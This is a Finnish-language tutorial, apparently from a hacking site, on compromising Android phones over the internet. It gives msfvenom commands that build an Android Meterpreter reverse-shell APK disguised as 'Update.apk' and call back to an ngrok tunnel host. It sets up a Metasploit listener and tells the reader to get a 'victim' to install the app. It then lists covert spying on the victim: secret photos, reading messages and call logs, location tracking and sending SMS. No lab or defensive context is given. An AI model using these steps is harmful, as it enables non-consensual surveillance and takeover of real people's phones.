Hacking over WAN
Voit tutustua video-oppaaseen youtubessa täältä:
https://youtu.be/Bbp-AcejtHI
Vakiintuneesti WAN:issa, ensinnäkin sinulla on oltava staattinen IP/Hostname ja toiseksi sinun täytyy tehdä Port Forwarding salliaksesi liikenteen siirron ja me kaikki tiedämme, että kumpikin on niin vaikeaa reaaliajassa, koska meillä on rajoitettu pääsy portteihin verkossa.
Tehdään siis tässä skenaariossa turvallinen tunneli Ngrokin avulla.
Ngrok on tunneloitava käänteinen välityspalvelinjärjestelmä, joka luo tunneleita julkisesta päätepisteestä eli internetistä paikallisesti toimivaan verkkopalveluun. Tämä voi auttaa meitä luomaan julkisen HTTP/HTTPS-URL-osoitteen paikallisesti koneellamme käynnissä olevalle verkkosivustolle. Meidän ei tarvitse tehdä minkäänlaista porttien välitystä Ngrokia käytettäessä, ja verkkopalvelumme paljastuu lopulta internetiin TCP-tunneloinnin avulla.
Seuraa näitä vaiheita edetäksesi:
Vaihe 1: Rekisteröidy Ngrok-tilille ladataksesi sen.
Ensiksi sinun on rekisteröidyttävä Ngrok-tilille, minkä jälkeen se pyytää sinua latausikkunaan.
Kirjautumisen jälkeen voit ladata Ngrokin Linux-järjestelmääsi.
Pura ladattu tiedosto yksinkertaisesti pakkauksesta.
Vaihe 2: Yhdistä tilisi
Komennon suorittaminen lisää auth-tunnuksesi oletusarvoiseksi määritetylle ngrok.yml
konfiguraatiotiedostolle. Tämä antaa sinulle pääsyn useampiin ominaisuuksiin ja pidempiin istuntoaikoihin. (Sinun täytyy kopioida ja liittää oma tokenisi tänne, joka tarjotaan ngrokin aloitusnäytössä kirjautumisen jälkeen)
./ngrok authtoken <your token>
Nyt olet valmis käyttämään tätä työkalua. Avaa terminaali siirry hakemistoon, johon olet purkanut Ngrock-työkalun ja kirjoita:
./ngrok tcp
valitse porttinumero, johon haluat sitoa yhteyden(tässä olen valinnut porttinumeroksi 5555). Ja kun painat enteriä, tulee näkyviin jotakuinkin tällainen ruutu.
Lähetys tässähän määritetään TCP-tunneli, jonka ngrok on luonut. Yhteys on sitoutunut localhostiin porttiin 5555. Nyt meidän on luotava haitallista hyötykuormaa käyttämällä msfvenomia.
Vaihe3: Hyötykuorman luominen
Voit tehdä sen avaamalla uuden terminaalin Kali Linux -koneessasi ja kirjoittamalla sitten seuraavan koodin.
msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15787 R> .apk
Mutta muistakaa, että tällä kertaa kyseessä on hieman erilainen hyökkäys kuin hyökkäys, jonka teimme lähiverkossa. Tässä IP-osoitteen sijasta meidän on syötettävä ngrokissa annettu edelleenlähetyslinkki (2.tcp.ngrok.io). Portin numero on 15787. Muista, että on tärkeää syöttää sama porttinumero, jonka Ngrok tarjoaa portin välityksessä.
Huomautus: Jos IP-osoitteen syöttäminen muodossa 2.tcp.ngrok.io ei toimi, voit korvata sen IP-osoitteella, jonka saat käyttämällä ”ping”-käskyä.
Avaa terminaali ja kirjoita ping 2.tcp.ngrok.io ja paina enter. Saat IP-osoitteen, joka sinun on laitettava LHOSTin tilalle.
Tässä olen käyttänyt hyötykuorman tiedostonimenä ”Update.apk”. Tämä tiedosto on asennettava kohteemme Android-laitteeseen. Mutta ennen tämän tiedoston asentamista meidän on asetettava kuuntelijamme. Seuraa vaihetta 4.
Vaihe 4: Kuuntelijan asettaminen
Avaa terminaali ja lataa Metasploit-konsoli kirjoittamalla: msfconsole
Sen jälkeen kun se latautuu(muutaman sekunnin kuluttua), lataa multi-handler exploit kirjoittamalla:
use exploit/multi/handler
Nyt aseta käänteinen hyötykuorma kirjoittamalla:
set payload android/meterpreter/reverse_tcp
Säädä LHOSTiksi 0.0.0.0 ja LPORTiksi 5555
(Porttinumeron tulee olla sama kuin porttinumero, jota käytettiin yhteyden sitomiseen ngrok:ssa)
set LHOST 0.0.0.0.0
set LPORT 5555
Kirjoita lopuksi exploit kuuntelijan käynnistämiseksi.
Vaihe 5: Asenna Malicious Update.apk-tiedosto kohdelaitteeseen
Anna uhrin asentaa sovellus ja suorita se heti, kun se on asennettu. Kun uhri koskettaa Avaa sovellus -vaihtoehtoa, saat käyttöösi kaikki android-laitteen ominaisuudet. Laitteen näytöllä ei kuitenkaan näy mitään sen jälkeen, kun sovellus on avattu.
Post-Exploitaatio
Kirjoita apu nähdäksesi erilaiset vaihtoehdot, joita voit käyttää eri tehtävien suorittamiseen uhrin laitteessa.
Voit päästä käsiksi uhrin kameraan ja ottaa valokuvan ilman, että siitä tarvitsee ilmoittaa. Voit myös tarkistaa heidän viestinsä, puhelulokinsa ja tallentaa ne järjestelmääsi.
Voit myös tarkastella ja avata minkä tahansa heidän laitteeseensa asennetun sovelluksen. Voit jopa saada käyttäjän tämänhetkiset sijaintikoordinaatit.
Voit myös lähettää viestejä mihin tahansa yhteystietonumeroon heidän laitteensa kautta.
Voit myös lähettää viestejä mihin tahansa yhteystietonumeroon hänen laitteensa kautta.